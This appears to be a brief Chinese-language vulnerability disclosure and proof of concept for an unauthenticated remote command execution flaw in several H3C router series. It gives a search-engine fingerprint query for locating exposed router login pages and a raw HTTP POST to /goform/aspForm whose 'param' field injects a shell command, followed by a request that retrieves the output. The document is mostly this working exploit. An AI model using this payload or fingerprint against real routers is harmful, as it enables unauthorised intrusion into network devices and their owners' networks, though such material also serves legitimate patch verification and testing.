H3C多系列路由器存在前台远程命令执行漏洞
一、漏洞简介
H3C多系列路由器存在前台远程命令执行漏洞。
二、影响版本
- H3C多系列路由器
三、资产测绘
- hunter
app.name="H3C Router Management" - 登录页面
四、漏洞复现
POST /goform/aspForm HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host:
CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/test);
/test